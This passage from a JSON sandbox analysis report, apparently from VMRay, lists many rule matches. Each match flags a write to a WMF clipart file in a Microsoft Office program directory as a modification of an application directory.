"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152558.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35884", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152558.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35891", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35898", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35905", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152570.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35912", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152594.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35919", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152594.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35926", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35933", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35940", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35949", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35956", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35963", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35970", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35979", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35988", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35999", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36006", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36013", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152696.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36020", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36027", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152702.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36034", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152704.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36041", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36048", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36055", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36062", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152876.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36069", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36076", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36083", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36090", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36097", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36104", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36111", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { 